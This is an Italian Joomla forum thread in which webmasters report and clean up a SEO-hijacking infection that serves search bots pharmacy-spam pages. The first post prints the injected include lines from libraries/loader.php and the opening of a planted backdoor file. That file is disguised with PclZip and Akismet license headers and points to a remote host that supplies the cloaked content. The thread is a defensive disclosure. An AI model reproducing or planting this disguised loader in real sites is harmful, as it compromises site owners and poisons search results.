Autore Topic: Segnalazione Hacking in the wild diffondete e segnalate (Letto 34545 volte)

Massimiliano Citterio · « **il:** 19 Apr 2017, 02:16:23 »

Gentili webmasters di Siti basati su joomla,

essendo recentemente stato attaccato su entrambi due siti da me amministrati con Joomla 3.6.5 ed avendo rimosso l'hacking ma non identificato la fonte, verificato tramite referenza google webmaster tools che almeno altri 500 siti hanno lo stesso problema nonostante i loro webmaster non se ne siano accorti sono a segnalarvi quanto segue con preghiera di verificare i vostri siti:

Tipo di Attacco:
SEO Hijacking

Payload:
il programma identifica il tipo di browser agent e qualora questo sia identificato come un Bot di motore di ricerca, sostituisce la pagina richiesta con una appositamente caricata in una cache remota al fine di fornire al browser una copia della pagina originale con tutti i link modificati per puntare ad un sito di vendita di Farmaci online Estero euro-pharm247.com

meccanismo di injection :
Probabile FTP tramite libreria Layer FTP Joomla innescato da un robot con riarmo periodico la cui fonte non sono riuscito ad identificare in quanto non ho i log e il provider li nega.

File Modificati:
libraries/loader.php

Codice Iniettato:

Codice: [Seleziona]

define('JPATH_ADAPTERSERVER',  dirname(__FILE__).'/joomla/base/adapterobserver.php');
if(file_exists(JPATH_ADAPTERSERVER))
@require_once(JPATH_ADAPTERSERVER);

File caricati
libraries/joomla/base/adapterobserver.php

Contenuto del file: oscurato dominio e codice di accesso alla cache remota
solo parte iniziale del file il file completo in allegato per referenza

Codice: [Seleziona]

<?php  
// --------------------------------------------------------------------------------
// PhpConcept Library - Zip Module 2.8.2
// --------------------------------------------------------------------------------
// License GNU/LGPL - Vincent Blavet - August 2009
// http://www.phpconcept.net
// --------------------------------------------------------------------------------
//
// Presentation :
//   PclZip is a PHP library that manage ZIP archives.
//   So far tests show that archives generated by PclZip are readable by
//   WinZip application and other tools.
//
// Description :
//   See readme.txt and http://www.phpconcept.net
//
// Warning :
//   This library and the associated files are non commercial, non professional
//   work.
//   It should not have unexpected results. However if any damage is caused by
//   this software the author can not be responsible.
//   The use of this software is at the risk of the user.
//
// --------------------------------------------------------------------------------
// $Id: pclzip.lib.php,v 1.60 2009/09/30 21:01:04 vblavet Exp $
// --------------------------------------------------------------------------------
/**
 * @package Akismet
 */
/*
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your <a href="plugins.php?page=akismet-key-config">Akismet configuration[/url] page, and save your API key.
Version: 2.5.3
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
*/
 
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/
error_reporting(0);      
ignore_user_abort(true); 
//@header('X-Powered-By:');
set_time_limit(0); 


define('__STATISTIC_URL__',    'http://botvsbrowser.com/rch_pdf/show.php');  
define('__DOMAIN_NAME__', 'domain.ltd);  
define('__SEC_VALUE__', 'axxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3');




//'#$GET_CONTENT_FUNCTIONS$#'
....

alexred · « **Risposta #1 il:** 19 Apr 2017, 08:39:48 »

Ciao Massimiliano Citterio,
erano presenti estensioni esterne installate in questi due siti che hanno bucato ?

Massimiliano Citterio · « **Risposta #2 il:** 19 Apr 2017, 09:12:05 »

Entrambi i siti erano stati migrati dalla 1.5 qualche anno fa utilizzando il plugin Red Migrator.

Altre estensioni erano presenti solo su uno dei due siti

di seguito linko l'unico riscontro nei motori di ricerca di un caso analogo con maggiori informazioni

https://wordpress.org/support/topic/polylang-spam-link-from-search-engine/

alexred · « **Risposta #3 il:** 19 Apr 2017, 09:14:40 »

verifica se anche le estensioni erano sempre state mantenute aggiornate.

Massimiliano Citterio · « **Risposta #4 il:** 19 Apr 2017, 10:10:04 »

dalla 3.0 in poi sempre mantenuto aggiornato in automatico con verifica il core, la traduzione e tutte le estensioni.

Nota:
Nel 2013 ero cliente di Websolutions per il mantenimento dei domini,
la società è stata violata in quell'anno ed il database degli utenti con passwords, domini e dati delle carte di credito è stato rubato.

A causa di questo ho dovuto rifare anche la carta di credito.

Devo verificare se è possibile che già in quel periodo non fosse stato inserita una backdoor di qualche tipo per concedere al bot la possibilità di scrivere.

Comunque a scanso di equivoci ho "Smerigliato lo spazio hosting"
Cambiato Provider , Reinstallato Una versione Vergine della 3.6.5 , esportato gli articoli e gli utenti , e ricaricato esclusivamente questi riconfigurato il template grafico, cambiato tutte le password.

Ora dal backup del sito precedente caricato in locale cercherò di capire qualcosa di più.

Vi tengo aggiornati se trovo qualcosa, sonno permettendo.

Alex21 · « **Risposta #5 il:** 19 Apr 2017, 11:45:12 »

Grazie per la segnalazione Massimiliano,
spero vivamente che riuscirai a risolvere per il meglio.

L' unico url sospetto che hai postato, forse l'unico trovato, http://botvsbrowser.com/rch_pdf/show.php risponde con una pagina completamente vuota, se esaminato con un browser privo della capacità di leggere il javascript. Meglio non chiamarlo con un browser a impostazioni normali, eh ...

L' IP di riferimento è questo 5.61.34.138
ed è di proprietà del Sistema Autonomo: AS28753 Leaseweb Deutschland GmbH un fornitore tedesco di server.
Una cosa che si può fare e che non costa nulla è inviare una mail al loro abuse segnalando che uno dei loro ip è coinvolto in un hackeraggio. L' ip non è assegnato a nessun host ma è praticamente impossibile che un ISP faccia direttamente attività che non dovrebbe, probabilmente uno dei loro clienti si è preso un ip di riserva, senza assegnarlo.
Anche se non rispondono faranno comunque dei controlli.
Ovviamente questo ip va bannato da ieri ...
Auguri e un saluto.

Massimiliano Citterio · « **Risposta #6 il:** 19 Apr 2017, 12:01:51 »

già fatta una indagine sull url

questo è il risultato

https://productforums.google.com/forum/#!topic/webmasters/62syo3QCRo0;context-place=topicsearchin/webmasters/category$3A(malware--hacked-sites)

il servizio in se stesso è Safe, ma può essere utilizzato per scopi malevoli da terzi.

Alex21 · « **Risposta #7 il:** 19 Apr 2017, 13:13:53 »

Vedo. Ci sono anche i tuoi post del 14 marzo.
Ho fatto una verifica. I file incriminati non li ho da nessuna parte, fortunatamente.
Ciao!

Ahmed Salvini · « **Risposta #8 il:** 19 Apr 2017, 15:04:06 »

Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc

Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking così chi visitava il tuo sito era soggetto a quell'attacco. Ce ne sono infiniti di siti così ma navigando con browser un minimo settati e magari protetti da no script questo difficilmente succede

Massimiliano Citterio · « **Risposta #9 il:** 20 Apr 2017, 13:48:17 »

Citazione da: Ahmed Salvini - 19 Apr 2017, 15:04:06

Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc

Hai frainteso questo non è un semplice hijacking,

ecco di cosa si tratta
https://cognitiveseo.com/blog/7255/defend-against-serp-hijacking-before-you-lose-your-rankings/

L'attacco è volto a essere invisibile agli utenti umani e visibile solo ai motori di ricerca, serve ad aumentare il ranking di ricerca di uno specifico sito, in questo caso un sito di vendita di farmaci online come sopra specificato , quasi sempre localizzato in uno stato per il quale l'attività di marketing seo non è normata e quindi, se non danneggia le persone o costituisce altro reato, non è punibile.

Cosa diversa invece per l'Italia dove il fatto costituisce "accesso abusivo a sistema informatico" ed è punibile ai sensi dell'art.615ter del codice penale.

https://it.wikipedia.org/wiki/Accesso_abusivo_a_un_sistema_informatico_o_telematico

Il problema è che grazie a questi provider di ......... che per poco più di 20 euro all'anno ti danno sì un hosting, ma in caso di accesso abusivo non ti danno gli strumenti per raccogliere le prove e dimostrare il fatto, ne tanto meno identificare l'attore responsabile che ha commesso il fatto illecito, probabilmente la faranno franca.

La mia speranza è che qualcun altro abbia subito l'attacco su un server virtuale o dedicato e che quindi sia in possesso, magari anche inconsciamente , delle tracce forensi per dimostrare l'illecito.

Voglio solo farvi capire che non ho postato questa segnalazione per chiedere aiuto o assistenza , anzi tutt'altro se qualcuno dovesse accorgersi di avere il file incriminato o si accorge di strane segnalazioni cercando il proprio sito su google , mi contatti pure che so come liberarvene. Se poi riusciamo anche a pizzicare il farabutto meglio.

Ho appena finito di ripulire la cache di google e le pagine indicizzate ed ho una lista con 539 siti con joomla o wordpress che risultano violati allo stesso modo, ma per assurdo per via della privacy non posso contattare i proprietari. Spero solo che un giorno facendo una ricerca trovino questo thread ed ottengano informazioni su caso. La cosa più brutta e trovarsi un virus o un trojan e non trovare nessuna informazione su internet; per un utente non professionista di informatica è disarmante.

Vi prego quindi d i rispondere a questo thread solo se avete rilevato l'infezione sul vostro sito o avete considerazioni rilevanti da fare sul caso, mi arriverà la notifica e cercherò di rispondervi appena possibile.

Spero che il moderatore sia d'accordo con me su questo.

Ciao a tutti.

Ahmed Salvini · « **Risposta #10 il:** 20 Apr 2017, 21:15:21 »

Mi spieghi la differenza?

Articolo:
Hijacked SERP
In this dreaded circumstance, a hacker gains access to your website and inserts keywords and links pointing to his business

Io:
Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking

tonicopi · « **Risposta #11 il:** 21 Apr 2017, 11:08:21 »

Grazie della utilissima segnalazione Massimiliano Citterio.
Qualche giorno fa google mi ha messo l'avviso di sito pericoloso e mi ha avvisato dell'hacheraggio.
In effetti nei risultati della ricerca da quel mio sito partivano dei redirect che finivano a quel sito di medicinali.
Scansionato il sito con antivirus in locale e su tre siti online non risutava presente malware.
Chiedevo riabilitazione a google che in pochi gironi me la concedeva.
Ma continuavo a vedere quei redirect nei risultati della ricerca. Non avrei saputo che pesci pigliare.
Quando googlando mi sono imbattuto in questo tuo meraviglioso dettagliato post.
Trovato i due file che hai segnalato. Ripulito il primo e cancellato il secondo. Redirect spariti!

L'accesso ftp e all'admin joomla a questo sito ce l'ho solo io.
Il sito è nato con joomla 3.2.1 ed è stato via via sempre aggiornato.
Se posso essere utile in qualche altro modo...
Grazie ancora!

danielecr · « **Risposta #12 il:** 21 Apr 2017, 11:42:02 »

E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?

tonicopi · « **Risposta #13 il:** 21 Apr 2017, 12:00:54 »

Citazione da: danielecr - 21 Apr 2017, 11:42:02

E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?

- Qui da me l'exploit non poteva essere fatto su una versione vecchia perchè sono partito con la 3.2.1
- ho chiesto adesso i file di log ma visto questo preso dalle loro FAQ ...e non c'è nemmeno la possibilità di avere accesso ai log di sistema.... non credo li avremo...

tonicopi · « **Risposta #14 il:** 21 Apr 2017, 12:16:47 »

Alè, beccato un altro sito, stesso provider, posso aggiungere che dei file modificati/aggiunti vedo la data via ftp: 22.2.2017
Il problema secondo me è molto serio e molto diffuso...

alexred · « **Risposta #15 il:** 21 Apr 2017, 13:49:27 »

Che sistema operativo avete nei PC che utilizzate per connettervi via FTP a questi siti ?
Che programma utilizzate per connettervi via FTP a questi siti?

Toni, nei siti che hai trovato bucati, c'erano delle estensioni esterne installate ?

tonicopi · « **Risposta #16 il:** 21 Apr 2017, 14:45:03 »

Mio sistema operativo Windows 7 ultimate.
Programma ftp filezilla 3.25.1
In entrambi i siti uso template warp7, widgetkit, Jce, cache cleaner, akeeba backup, sh404sef.
Ma sono tutte aggiornate e le stesse estensioni le uso anche in altre decine di siti che non sono stati hackerati.
Per il momento.
Questo hackeraggio è davvero subdolo: ha ingannato persino gli operatori di google i quali, esaminando le pagine incriminate da browser anzichè dalla ricerca, hanno riabilitato il sito senza che in realtà fosse stato ripulito.

Sul secondo sito sono intervenuto prima che se ne accorgesse nessuno, grazie a questo post.

danielecr · « **Risposta #17 il:** 21 Apr 2017, 15:24:17 »

Diffuso sembra diffuso...forse troppo diffuso...senza i file di log però purtroppo non possiamo capire da dove ha origine, come penso interpreti Alex, l'infezione potrebbe essere partita dal pc con un keylogger o qualcosa di simile..

alexred · « **Risposta #18 il:** 21 Apr 2017, 15:25:23 »

Ricordo una cosa simile molti anni fa ed il problema era un malware sui PC windows che prendeva i dati di connessione dalla configurazione di Filezilla (che li salvava in chiaro) e li inviava all'attaccante.
Ma non saprei se anche in questo caso sia questo il problema.

tonicopi · « **Risposta #19 il:** 21 Apr 2017, 16:03:39 »

Citazione da: danielecr - 21 Apr 2017, 15:24:17

...senza i file di log però purtroppo non possiamo capire da dove ha origine....

Ecco e non me li danno i file di log. Suggeriscono:

Le consigliamo di:
- effettuare un'accurata scansione antivirus ed antitrojan del suo PC
- modificare i dati di accesso FTP (e farlo periodicamente)
- aggiornare gli scripts presenti nello spazio web (ad esempio per joomla ci sono diversi exploit noti per le versioni non aggiornati)
- controllare il codice degli scripts PHP presenti nello spazio, perché potrebbero esserci backdoor

mentre mi annuciano che stanno implementando la possibilità per il cliente di accedere ai file di log. Tra qualche mese la feature sarà disponibile.